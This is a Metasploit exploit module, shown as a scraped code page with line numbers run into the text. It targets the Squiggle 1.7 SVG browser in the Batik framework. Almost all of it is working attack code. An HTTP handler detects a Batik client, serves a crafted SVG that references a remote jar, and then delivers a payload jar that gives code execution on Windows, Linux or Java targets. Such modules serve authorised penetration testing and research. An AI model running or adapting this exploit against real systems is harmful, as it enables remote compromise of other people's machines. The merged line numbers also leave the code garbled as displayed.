Path: blob/master/modules/exploits/multi/misc/batik_svg_java.rb
31452 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Squiggle 1.7 SVG Browser Java Code Execution',15'Description' => %q{16This module abuses the SVG support to execute Java Code in the17Squiggle Browser included in the Batik framework 1.7 through a18crafted SVG file referencing a jar file.1920In order to gain arbitrary code execution, the browser must meet21the following conditions: (1) It must support at least SVG version221.1 or newer, (2) It must support Java code and (3) The "Enforce23secure scripting" check must be disabled.2425The module has been tested against Windows and Linux platforms.26},27'License' => MSF_LICENSE,28'Author' => [29'Nicolas Gregoire', # aka @Agarri_FR, Abuse discovery and PoC30'sinn3r', # Metasploit module31'juan vazquez' # Metasploit module32],33'References' => [34['OSVDB', '81965'],35['URL', 'http://www.agarri.fr/blog/']36],37'Payload' => {38'Space' => 20480,39'BadChars' => '',40'DisableNops' => true41},42'DefaultOptions' => {43'EXITFUNC' => 'thread'44},45'Targets' => [46[47'Generic (Java Payload)',48{49'Arch' => ARCH_JAVA50}51],52[53'Windows Universal',54{55'Arch' => ARCH_X86,56'Platform' => 'win'57}58],59[60'Linux x86',61{62'Arch' => ARCH_X86,63'Platform' => 'linux'64}65]66],67'Privileged' => false,68'DisclosureDate' => '2012-05-11',69'DefaultTarget' => 0,70'Notes' => {71'Reliability' => UNKNOWN_RELIABILITY,72'Stability' => UNKNOWN_STABILITY,73'SideEffects' => UNKNOWN_SIDE_EFFECTS74}75)76)77end7879def on_request_uri(cli, request)80agent = request.headers['User-Agent']81jar_uri = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource82jar_uri << "/#{rand_text_alpha(rand(3..8))}.jar"83rand_text = Rex::Text.rand_text_alphanumeric(rand(4..11))8485if request.uri =~ /\.jar$/86paths = [87[ 'Exploit.class' ],88[ 'Exploit$1.class'],89[ 'META-INF', 'MANIFEST.MF']90]9192p = regenerate_payload(cli)9394jar = p.encoded_jar95paths.each do |path|961.upto(path.length - 1) do |idx|97full = path[0, idx].join('/') + '/'98if !(jar.entries.map { |e| e.name }.include?(full))99jar.add_file(full, '')100end101end102103fd = File.open(File.join(Msf::Config.data_directory, 'exploits', 'batik_svg', path), 'rb')104data = fd.read(fd.stat.size)105jar.add_file(path.join('/'), data)106fd.close107end108109print_status("#{cli.peerhost} - Sending jar payload")110send_response(cli, jar.pack, { 'Content-Type' => 'application/java-archive' })111112elsif agent =~ /Batik/113svg = %(114<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" version="1.0">115<script type="application/java-archive" xlink:href="#{jar_uri}"/>116<text>#{rand_text}</text>117</svg>118)119120svg = svg.gsub(/\t\t\t/, '')121print_status("#{cli.peerhost} - Sending SVG")122send_response(cli, svg, { 'Content-Type' => 'image/svg+xml' })123124else125print_error("#{cli.peerhost} - Unknown client request: #{request.uri.inspect}")126end127end128end129130131